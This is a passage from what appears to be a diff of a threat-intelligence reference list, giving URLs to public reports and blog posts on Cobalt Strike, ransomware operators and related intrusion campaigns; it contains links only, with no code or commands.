"https://labs.f-secure.com/blog/detecting-exposed-cobalt-strike-dns-redirectors", - "https://blog.reconinfosec.com/analysis-of-exploitation-cve-2020-10189/", - "https://blogs.blackberry.com/en/2020/12/mountlocker-ransomware-as-a-service-offers-double-extortion-capabilities-to-affiliates", - "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf", - "https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-xakerske-ugrupovannya-u-rozpovsyudzhenni-virusu-shifruvalnika-ta-nanesenni-inozemnim-kompaniyam-piv-milyarda-dolariv-zbitkiv/", - "https://www.secureworks.com/blog/hades-ransomware-operators-use-distinctive-tactics-and-infrastructure", - "https://awakesecurity.com/blog/catching-the-white-stork-in-flight/", - "https://twitter.com/redcanary/status/1334224861628039169", - 
"https://thehackernews.com/2022/05/malware-analysis-trickbot.html", - "https://www.incibe-cert.es/sites/default/files/contenidos/estudios/doc/incibe-cert_estudio_analisis_nobelium_2022_v1.pdf", - "https://www.mandiant.com/resources/defining-cobalt-strike-components", - "https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf", - "https://blueteamblog.com/darkside-ransomware-operations-preventions-and-detections", - "https://www.proofpoint.com/us/blog/threat-insight/nimzaloader-ta800s-new-initial-access-malware", - "https://www.inky.com/blog/colonial-pipeline-ransomware-hack-unleashes-flood-of-related-phishing-attempts", - "https://www.bleepingcomputer.com/news/security/cisa-updates-conti-ransomware-alert-with-nearly-100-domain-names/", - "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-dianxun.pdf", - "https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575", - "https://www.welivesecurity.com/2021/08/24/sidewalk-may-be-as-dangerous-as-crosswalk/", - "https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2", - "https://www.prodaft.com/m/reports/WizardSpider_TLPWHITE_v.1.4.pdf", - "https://cert.gov.ua/article/619229", - "https://blog.cobaltstrike.com/2021/02/09/learn-pipe-fitting-for-all-of-your-offense-projects/", - "https://blog.exatrack.com/melofee/", - "http://blog.nsfocus.net/murenshark", - "https://www.intrinsec.com/proxynotshell-owassrf-merry-xchange/", - "https://community.riskiq.com/article/f0320980", - "https://www.crowdstrike.com/blog/how-falcon-complete-stopped-a-solarwinds-serv-u-exploit-campaign/", - "https://twitter.com/Unit42_Intel/status/1421117403644186629?s=20", - "https://decoded.avast.io/luigicamastra/backdoored-client-from-mongolian-ca-monpass", - "https://blog.cobaltstrike.com/2020/03/04/cobalt-strike-joins-core-impact-at-helpsystems-llc/", - "https://blog.talosintelligence.com/2021/05/ctir-case-study.html", - 
"https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf", - "https://thedfirreport.com/2021/06/20/from-word-to-lateral-movement-in-1-hour/", - "https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html", - "https://us-cert.cisa.gov/ncas/alerts/aa21-265a", - "https://www.mandiant.com/resources/russian-targeting-gov-business", - "https://blog.securityonion.net/2022/02/quick-malware-analysis-emotet-epoch-5.html", + "https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-annex-download.pdf", "https://michaelkoczwara.medium.com/cobalt-strike-powershell-payload-analysis-eecf74b3c2f7", + "https://www.infinitumit.com.tr/en/conti-ransomware-group-behind-the-karakurt-hacking-team/", + "https://www.fintechsecurity.com.hk/slides/01.Dmitry-Annual-Group-IB-report-High-Tech-Crime-Trends.pdf", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-268a", + "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf", + "https://www.secureworks.com/research/threat-profiles/tin-woodlawn", + "https://www.secureworks.com/research/threat-profiles/bronze-mohawk", + "https://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html", + "https://thedfirreport.com/2021/05/12/conti-ransomware/", + "https://twitter.com/alex_lanstein/status/1399829754887524354", "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/542/original/CTIR_casestudy_2.pdf", "https://us-cert.cisa.gov/ncas/alerts/aa21-148a", - "https://www.wilbursecurity.com/2020/03/trickbot-to-ryuk-in-two-hours/", - "https://attackiq.com/2022/06/03/attack-graph-response-to-us-cert-aa22-152a-karakurt-data-extortion-group/", - "https://security.macnica.co.jp/blog/2022/05/iso.html", - 
"https://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer--a-ransomware--and-a-botnet-join-the-part.html", - "https://github.com/0xjxd/SquirrelWaffle-From-Maldoc-to-Cobalt-Strike/raw/main/2021-10-02%20-%20SquirrelWaffle%20-%20From%20Maldoc%20to%20Cobalt%20Strike.pdf", - "https://go.recordedfuture.com/hubfs/reports/mtp-2021-0914.pdf", - "https://labs.sentinelone.com/noblebaron-new-poisoned-installers-could-be-used-in-supply-chain-attacks/", - "https://www.proofpoint.com/us/blog/threat-insight/cobalt-strike-favorite-tool-apt-crimeware", - "https://www.trustnet.co.il/blog/virus-alert-to-powershell-encrypted-loader/", - "https://rastamouse.me/ntlm-relaying-via-cobalt-strike/", - "https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-annex-download.pdf", - "https://medium.com/walmartglobaltech/from-royal-with-love-88fa05ff7f65", - "https://videos.didierstevens.com/2022/09/06/an-obfuscated-beacon-extra-xor-layer/", - "https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf", - "https://401trg.com/burning-umbrella/ ", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", - "https://www.hhs.gov/sites/default/files/bazarloader.pdf", - "https://www.zscaler.com/blogs/security-research/squirrelwaffle-new-loader-delivering-cobalt-strike", - "https://blog.cyble.com/2022/06/23/matanbuchus-loader-resurfaces/", - "https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/", - "https://isc.sans.edu/diary/rss/27176", - "https://blog.talosintelligence.com/2022/08/manjusaka-offensive-framework.html", - "https://tccontre.blogspot.com/2019/11/cobaltstrike-beacondll-your-not.html", - 
"https://cluster25.io/2022/05/03/a-strange-link-between-a-destructive-malware-and-the-loader-of-a-ransomware-group-isaacwiper-vs-vatet/", - "https://news.sophos.com/en-us/2020/10/14/inside-a-new-ryuk-ransomware-attack/", - "https://mp.weixin.qq.com/s/cGS8FocPnUdBconLbbaG-g", - "https://www.secureworks.com/research/threat-profiles/bronze-mohawk", - "https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/", - "https://medium.com/cycraft/taiwan-high-tech-ecosystem-targeted-by-foreign-apt-group-5473d2ad8730", - "https://bmcder.com/blog/cobalt-strike-dfir-listening-to-the-pipes", - "https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon", - "https://www.youtube.com/watch?v=gfYswA_Ronw", - "https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html", - "https://www.mandiant.com/resources/tracking-apt29-phishing-campaigns", - "https://mp.weixin.qq.com/s/peIpPJLt4NuJI1a31S_qbQ", - "https://news.sophos.com/en-us/2021/04/21/nearly-half-of-malware-now-use-tls-to-conceal-communications/", - "https://blog.talosintelligence.com/2020/06/indigodrop-maldocs-cobalt-strike.html", - "https://blog.google/threat-analysis-group/how-we-protect-users-0-day-attacks/", - "https://www.secureworks.com/research/threat-profiles/gold-dupont", - "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/sneak-peek-ch1-2-finding-beacons-in-the-dark.pdf", - "https://unit42.paloaltonetworks.com/bazarloader-network-reconnaissance/", - "https://www.youtube.com/watch?v=GfbxHy6xnbA", - "https://blog.bushidotoken.net/2022/06/overview-of-russian-gru-and-svr.html", - "https://insight-jp.nttsecurity.com/post/102ho8o/operation-restylink", - "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/growling-bears-make-thunderous-noise.html", - "http://www.secureworks.com/research/threat-profiles/gold-winter", - 
"https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan", - "https://forensicitguy.github.io/analyzing-cactustorch-hta-cobaltstrike/", - "https://www.telsy.com/download/5972/?uid=d7c082ba55", - "https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Tseng-Mem2Img-Memory-Resident-Malware-Detection-via-Convolution-Neural-Network.pdf", - "https://www.youtube.com/watch?v=ysN-MqyIN7M", - "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/China/APT/Chimera/Analysis.md", - "https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/", - "https://www.cybereason.com/blog/threat-analysis-report-from-shatak-emails-to-the-conti-ransomware", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware", - "https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html", - "https://www.huntress.com/blog/cobalt-strike-analysis-of-obfuscated-malware", - "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/", - "https://blog.zsec.uk/cobalt-strike-profiles/", - "https://blog.macnica.net/blog/2020/11/dtrack.html", - "https://www.ironnet.com/blog/tracking-cobalt-strike-servers-used-in-cyberattacks-on-ukraine", - "https://ak100117.medium.com/analyzing-cobalt-strike-powershell-payload-64d55ed3521b", - "https://unit42.paloaltonetworks.com/hancitor-infections-cobalt-strike/", - "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", - "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v", - "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html", - "https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/", - "https://www.fortinet.com/blog/threat-research/the-year-of-the-wiper", - "https://www.cobaltstrike.com/support", - 
"https://www.youtube.com/watch?v=pIXl79IPkLI", - "https://cocomelonc.github.io/tutorial/2022/05/09/malware-pers-4.html", - "https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/", - "https://medium.com/walmartglobaltech/cobaltstrike-stager-utilizing-floating-point-math-9bc13f9b9718", - "https://blogs.blackberry.com/en/2021/11/zebra2104", - "https://thedfirreport.com/2022/03/07/2021-year-in-review/", - "https://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot", - "https://www.secureworks.com/research/darktortilla-malware-analysis", - "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/how-cybercriminals-abuse-cloud-tunneling-services", "https://www.secureworks.com/research/threat-profiles/gold-kingswood", - "https://blog.group-ib.com/REvil_RaaS", - "https://thedfirreport.com/2022/01/24/cobalt-strike-a-defenders-guide-part-2/", - "https://newtonpaul.com/analysing-fileless-malware-cobalt-strike-beacon/", - "https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_201_haruyama_jp.pdf", - "https://www.advintel.io/post/advintel-s-state-of-emotet-aka-spmtools-displays-over-million-compromised-machines-through-2022", - "https://bmcder.com/blog/extracting-cobalt-strike-from-windows-error-reporting", - "https://mez0.cc/posts/cobaltstrike-powershell-exec/", - "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack", - "https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/", - "https://labs.sentinelone.com/inside-a-trickbot-cobaltstrike-attack-server/", - "https://blog.prevailion.com/wizard-spider-continues-to-confound-4298370f6903", - "https://research.nccgroup.com/2020/06/15/striking-back-at-retired-cobalt-strike-a-look-at-a-legacy-vulnerability/", - "https://isc.sans.edu/forums/diary/Qakbot+infection+with+Cobalt+Strike+and+VNC+activity/28448/", - 
"https://www.contextis.com/en/blog/dll-search-order-hijacking", - "https://www.sentinelone.com/blog/from-the-front-lines-peering-into-a-pysa-ransomware-attack/", - "https://www.trustedsec.com/blog/tailoring-cobalt-strike-on-target/", - "https://blogs.blackberry.com/en/2022/01/log4u-shell4me", - "https://ics-cert.kaspersky.com/publications/reports/2022/06/27/attacks-on-industrial-control-systems-using-shadowpad/", - "https://www.huntress.com/blog/cybersecurity-advisory-vmware-horizon-servers-actively-being-hit-with-cobalt-strike", - "https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/", - "https://michaelkoczwara.medium.com/cobalt-strike-hunting-dll-hijacking-attack-analysis-ffbf8fd66a4e", - "https://www.trendmicro.com/en_us/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict.html", - "https://www.trendmicro.com/en_us/research/21/k/Squirrelwaffle-Exploits-ProxyShell-and-ProxyLogon-to-Hijack-Email-Chains.html", - "https://blog.nviso.eu/2021/04/26/anatomy-of-cobalt-strike-dll-stagers/", - "https://medium.com/cycraft/china-linked-threat-group-targets-taiwan-critical-infrastructure-smokescreen-ransomware-c2a155aa53d5", - "https://blog.talosintelligence.com/2022/05/mustang-panda-targets-europe.html", - "https://medium.com/walmartglobaltech/investigation-into-the-state-of-nim-malware-14cc543af811", - "https://blog.truesec.com/2020/12/22/collaboration-between-fin7-and-the-ryuk-group-a-truesec-investigation/", - "https://www.esentire.com/blog/icedid-to-cobalt-strike-in-under-20-minutes", - "https://teamt5.org/en/posts/hiding-in-plain-sight-obscuring-c2s-by-abusing-cdn-services", - "https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html", - "https://intel471.com/blog/shipping-companies-ransomware-credentials", - "https://twitter.com/vikas891/status/1385306823662587905", - "https://content.fireeye.com/m-trends/rpt-m-trends-2020", - 
"https://github.com/sophos-cybersecurity/solarwinds-threathunt", - "https://shells.systems/in-memory-shellcode-decoding-to-evade-avs/", - "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf", - "https://www.recordedfuture.com/solardeflection-c2-infrastructure-used-by-nobelium-in-company-brand-misuse/", - "https://www.cynet.com/orion-threat-alert-flight-of-the-bumblebee/", - "https://experience.mandiant.com/trending-evil-2/p/1", - "https://github.com/Sentinel-One/CobaltStrikeParser/blob/master/parse_beacon_config.py", - "https://www.youtube.com/watch?v=XfUTpwZKCDU", - "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/", - "https://isc.sans.edu/diary/rss/27618", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-011.pdf", - "https://stillu.cc/threat-spotlight/2021/11/13/domain-fronting-fastly/", - "https://www.youtube.com/watch?v=LA-XE5Jy2kU", - "https://blog.malwarebytes.com/threat-intelligence/2021/11/a-multi-stage-powershell-based-attack-targets-kazakhstan/", - "https://go.recordedfuture.com/hubfs/reports/cta-2022-0503.pdf", - "https://github.com/swisscom/detections/blob/main/RYUK/cobaltstrike_c2s.txt", - "https://news.sophos.com/en-us/2022/02/23/dridex-bots-deliver-entropy-ransomware-in-recent-attacks/", - "https://isc.sans.edu/diary/Bumblebee+Malware+from+TransferXL+URLs/28664", - "https://netresec.com/?b=214d7ff", - "https://www.inde.nz/blog/different-kind-of-zoombomb", - "https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf", - "https://asec.ahnlab.com/ko/19860/", - "https://www.guidepointsecurity.com/blog/a-ransomware-near-miss-proxyshell-a-rat-and-cobalt-strike/", - "https://www.cynet.com/understanding-squirrelwaffle/", - "https://paper.seebug.org/1301/", - "https://www.wired.com/story/russias-fancy-bear-hack-us-federal-agency/", - "https://www.accenture.com/us-en/blogs/cyber-defense/double-extortion-campaigns", - 
"https://thedfirreport.com/2021/06/28/hancitor-continues-to-push-cobalt-strike/", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war", - "https://www.istrosec.com/blog/apt-sk-cobalt/", - "https://isc.sans.edu/diary/rss/28934", - "https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-transnaczionalne-zlochinne-ugrupovannya-u-nanesenni-inozemnim-kompaniyam-120-miljoniv-dolariv-zbitkiv/", - "https://dansec.medium.com/detecting-malicious-c2-activity-spawnas-smb-lateral-movement-in-cobaltstrike-9d518e68b64", - "https://documents.trendmicro.com/assets/white_papers/wp-earth-baku-an-apt-group-targeting-indo-pacific-countries.pdf", - "https://www.accenture.com/us-en/blogs/security/ransomware-hades", - "https://news.sophos.com/en-us/2021/05/07/new-lemon-duck-variants-exploiting-microsoft-exchange-server/?cmp=30728", - "https://sixdub.medium.com/using-kaitai-to-parse-cobalt-strike-beacon-configs-f5f0552d5a6e", - "https://www.picussecurity.com/resource/blog/ttps-used-in-the-solarwinds-breach", - "https://cocomelonc.github.io/malware/2022/09/06/malware-tricks-23.html", - "https://securelist.com/apt-trends-report-q3-2020/99204/", - "https://www.advintel.io/post/anatomy-of-attack-truth-behind-the-costa-rica-government-ransomware-5-day-intrusion", - "http://blog.morphisec.com/new-global-attack-on-point-of-sale-systems", - "https://blog.talosintelligence.com/2022/06/avoslocker-new-arsenal.html", - "https://www2.deloitte.com/content/dam/Deloitte/dk/Documents/Grabngo/Aarhus_miniseminar_291118.pdf", - "https://blog.talosintelligence.com/2021/10/squirrelwaffle-emerges.html", - "https://www.justice.gov/opa/pr/justice-department-announces-court-authorized-seizure-domain-names-used-furtherance-spear", - "https://www.advintel.io/post/blackcat-in-a-shifting-threat-landscape-it-helps-to-land-on-your-feet-tech-dive", - 
"https://news.sophos.com/en-us/2021/10/04/atom-silo-ransomware-actors-use-confluence-exploit-dll-side-load-for-stealthy-attack/", - "https://www.cybereason.com/blog/threat-analysis-report-datoploader-exploits-proxyshell-to-deliver-qbot-and-cobalt-strike", - "https://blog.nviso.eu/2021/10/21/cobalt-strike-using-known-private-keys-to-decrypt-traffic-part-1/", - "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf", - "https://blog.nviso.eu/2021/11/17/cobalt-strike-decrypting-obfuscated-traffic-part-4/", - "https://medium.com/walmartglobaltech/investigation-into-the-state-of-nim-malware-part-2-a28bffffa671", - "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sodinokibi-ransomware-cobalt-strike-pos", - "https://news.sophos.com/en-us/2021/09/21/cring-ransomware-group-exploits-ancient-coldfusion-server/?cmp=30728", - "https://www.prodaft.com/m/uploads/SilverFish_TLPWHITE.pdf", - "https://blog.nviso.eu/2022/03/22/cobalt-strike-overview-part-7/", - "https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus", - "https://elis531989.medium.com/the-squirrel-strikes-back-analysis-of-the-newly-emerged-cobalt-strike-loader-squirrelwaffle-937b73dbd9f9", - "https://file2.api.drift.com/download/drift-prod-file-uploads/417f%2F417f74ae8ddd24aa7c2b43a23093983f/Supply%20Chain%20Attacks_%20Cyber%20Criminals%20Target%20the%20Weakest%20Link.pdf", - "https://morphuslabs.com/attackers-are-abusing-msbuild-to-evade-defenses-and-implant-cobalt-strike-beacons-edac4ab84f42", - "https://thedfirreport.com/2022/04/25/quantum-ransomware/", - "https://blog.morphisec.com/proxyshell-exchange-exploitation-now-leads-to-an-increasing-amount-of-cobaltstrike-backdoors", - 
"https://thedfirreport.com/2022/09/26/bumblebee-round-two/", - "https://www.secureworks.com/research/threat-profiles/bronze-riverside", - "https://r136a1.info/2022/05/25/introduction-of-a-pe-file-extractor-for-various-situations/", - "https://isc.sans.edu/forums/diary/Emotet%20infection%20with%20Cobalt%20Strike/28824/", - "https://www.ic3.gov/Media/News/2021/210823.pdf", - "https://www.secureworks.com/research/threat-profiles/gold-waterfall", - "https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/", - "https://www.ironnet.com/blog/ransomware-graphic-blog", - "https://www.accenture.com/us-en/blogs/cyber-defense/karakurt-threat-mitigation", - "https://documents.trendmicro.com/assets/txt/earth-berberoka-windows-iocs-2.txt", - "https://unit42.paloaltonetworks.com/cobalt-strike-memory-analysis/", - "https://forensicitguy.github.io/inspecting-powershell-cobalt-strike-beacon/", - "https://orangematter.solarwinds.com/2021/01/11/new-findings-from-our-investigation-of-sunburst/", - "https://wbglil.gitbook.io/cobalt-strike/", - "https://www.crowdstrike.com/blog/four-popular-defensive-evasion-techniques-in-2021/", - "https://skyblue.team/posts/scanning-virustotal-firehose/", - "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya", - "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/harvester-new-apt-attacks-asia", - "https://www.ncsc.gov.ie/pdfs/HSE_Conti_140521_UPDATE.pdf", - "https://www.bleepingcomputer.com/news/security/vulnerable-microsoft-sql-servers-targeted-with-cobalt-strike/", - "https://msrc.microsoft.com/blog/2022/10/hunting-for-cobalt-strike-mining-and-plotting-for-fun-and-profit/", + "https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire", 
"https://svch0st.medium.com/stats-from-hunting-cobalt-strike-beacons-c17e56255f9b", - "https://twitter.com/elisalem9/status/1398566939656601606", - "https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis", - "https://www.pentestpartners.com/security-blog/cobalt-strike-walkthrough-for-red-teamers/", - "https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government", - "https://thehackernews.com/2022/05/this-new-fileless-malware-hides.html", - "https://binary.ninja/2022/07/22/reverse-engineering-cobalt-strike.html", - "https://medium.com/walmartglobaltech/cobaltstrike-uuid-stager-ca7e82f7bb64", - "https://www.crowdstrike.com/blog/how-crowdstrike-threat-hunters-identified-a-confluence-exploit/", - "https://thedfirreport.com/2021/07/19/icedid-and-cobalt-strike-vs-antivirus/", - "https://www.0ffset.net/reverse-engineering/malware-analysis/squirrelwaffle-main-loader/", - "https://www.varonis.com/blog/hive-ransomware-analysis", - "https://securelist.com/apt-luminousmoth/103332/", - "https://blog.google/threat-analysis-group/initial-access-broker-repurposing-techniques-in-targeted-attacks-against-ukraine/", - "https://michaelkoczwara.medium.com/mapping-and-pivoting-cobalt-strike-c2-infrastructure-attributed-to-cve-2021-40444-438786fcd68a", - "https://quake.360.cn/quake/#/reportDetail?id=5fc6fedd191038c3b25c4950", - "https://thedfirreport.com/2020/10/08/ryuks-return/", - "https://www.advanced-intel.com/post/secret-backdoor-behind-conti-ransomware-operation-introducing-atera-agent", - "https://www.youtube.com/watch?v=y65hmcLIWDY", - "https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/", - "https://cyber.wtf/2022/03/23/what-the-packer/", - "https://pylos.co/2018/11/18/cozybear-in-from-the-cold/", - "https://www.infinitumit.com.tr/en/conti-ransomware-group-behind-the-karakurt-hacking-team/", - "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf", - 
"https://www.youtube.com/watch?v=WW0_TgWT2gs", - "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf", - "https://zero.bs/cobaltstrike-beacons-analyzed.html", - "https://www.wired.com/story/chinese-hackers-taiwan-semiconductor-industry-skeleton-key/", - "https://awakesecurity.com/blog/detecting-icedid-and-cobalt-strike-beacon-with-network-detection-and-response/", - "https://connormcgarr.github.io/thread-hijacking/", - "https://isc.sans.edu/diary/rss/28448", - "https://www.youtube.com/watch?v=FC9ARZIZglI", - "https://web.br.de/interaktiv/ocean-lotus/en/", - "https://community.riskiq.com/article/0bcefe76", - "https://unit42.paloaltonetworks.com/fireeye-red-team-tool-breach/", - "https://www.mdsec.co.uk/2021/07/investigating-a-suspicious-service/", - "https://blog.morphisec.com/vmware-identity-manager-attack-backdoor", - "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html", - "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf", - "https://breakpoint-labs.com/blog/cobalt-strike-and-ransomware-tracking-an-effective-ransomware-campaign/", - "https://twitter.com/AltShiftPrtScn/status/1385103712918642688", - "https://blog.securehat.co.uk/malware-analysis/extracting-the-cobalt-strike-config-from-a-teardrop-loader", - "https://www.cyborgsecurity.com/blog/you-dont-know-the-hafnium-of-it/", - "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", - "https://blogs.jpcert.or.jp/en/2018/08/volatility-plugin-for-detecting-cobalt-strike-beacon.html", - "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/", - "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout", - 
"https://elastic.github.io/security-research/intelligence/2022/01/02.collecting-cobalt-strike-beacons/article/", "https://www.youtube.com/watch?v=6SDdUVejR2w", - "https://www.sekoia.io/en/an-insider-insights-into-conti-operations-part-one", - "https://marcoramilli.com/2022/05/10/a-malware-analysis-in-ru-au-conflict/", - "https://www.europol.europa.eu/newsroom/news/12-targeted-for-involvement-in-ransomware-attacks-against-critical-infrastructure", - "https://twitter.com/ffforward/status/1324281530026524672", - "https://redcanary.com/blog/intelligence-insights-december-2021", - "https://kienmanowar.wordpress.com/2022/06/04/quicknote-cobaltstrike-smb-beacon-analysis-2/", - "https://www.malware-traffic-analysis.net/2021/09/17/index.html", - "https://www.microsoft.com/security/blog/2022/04/13/dismantling-zloader-how-malicious-ads-led-to-disabled-security-tools-and-ransomware/", - "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", - "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", - "https://www.bleepingcomputer.com/news/security/emotet-now-drops-cobalt-strike-fast-forwards-ransomware-attacks/", - "https://www.kroll.com/en/insights/publications/cyber/black-basta-technical-analysis", - "https://www.netskope.com/blog/squirrelwaffle-new-malware-loader-delivering-cobalt-strike-and-qakbot", - "https://blog.morphisec.com/log4j-exploit-hits-again-vulnerable-vmware-horizon-servers-at-risk", - "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/", - "https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.html", - "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", - "https://www.cisa.gov/uscert/ncas/alerts/aa22-249a", - 
"https://haggis-m.medium.com/malleable-c2-profiles-and-you-7c7ab43e7929", - "https://medium.com/walmartglobaltech/signed-dll-campaigns-as-a-service-7760ac676489", - "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/", - "https://thedfirreport.com/2021/11/01/from-zero-to-domain-admin/", - "https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/", - "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", - "https://www.trendmicro.com/en_us/research/21/i/remote-code-execution-zero-day--cve-2021-40444--hits-windows--tr.html", - "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions", - "https://i.blackhat.com/USA-20/Thursday/us-20-Chen-Operation-Chimera-APT-Operation-Targets-Semiconductor-Vendors.pdf", - "https://medium.com/walmartglobaltech/socgholish-campaigns-and-initial-access-kit-4c4283fea8ee", - "https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone/", - "https://twitter.com/MBThreatIntel/status/1412518446013812737", - "https://www.darktrace.com/en/blog/catching-apt-41-exploiting-a-zero-day-vulnerability/", - "https://engineering.salesforce.com/easily-identify-malicious-servers-on-the-internet-with-jarm-e095edac525a", - "https://www.advintel.io/post/backup-removal-solutions-from-conti-ransomware-with-love", - "https://www.trendmicro.com/en_us/research/21/i/examining-the-cring-ransomware-techniques.html", - "https://www.getrevue.co/profile/80vul/issues/hunting-cobalt-strike-dns-redirectors-by-using-zoomeye-580734", - "https://www.sentinelone.com/blog/hive-ransomware-deploys-novel-ipfuscation-technique/", - "https://twitter.com/GossiTheDog/status/1438500100238577670", - "https://michaelkoczwara.medium.com/hunting-c2-with-shodan-223ca250d06f", - "https://asec.ahnlab.com/en/31811/", - 
